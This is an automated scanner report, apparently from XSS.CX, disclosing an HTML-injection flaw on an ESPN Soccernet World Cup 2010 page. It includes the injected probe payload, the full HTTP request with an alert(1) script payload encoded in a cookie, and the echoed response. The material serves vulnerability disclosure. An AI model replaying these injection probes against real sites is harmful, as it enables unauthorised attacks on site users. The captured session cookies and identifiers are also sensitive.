The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82ccb"><a>dea0025a04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/6757/serbia?82ccb"><a>dea0025a04=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:26:06 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:26:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN19
Cache-Expires: Sat, 06 Nov 2010 23:31:06 GMT
Content-Length: 82015
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Serbia Football / S
...[SNIP]...
<a href="/worldcup2010/team?team=6757&82ccb"><a>dea0025a04=1&_slug_=serbia&82ccb">
...[SNIP]...
|
Report generated by XSS.CX at Sat Nov 13 20:12:03 CST 2010.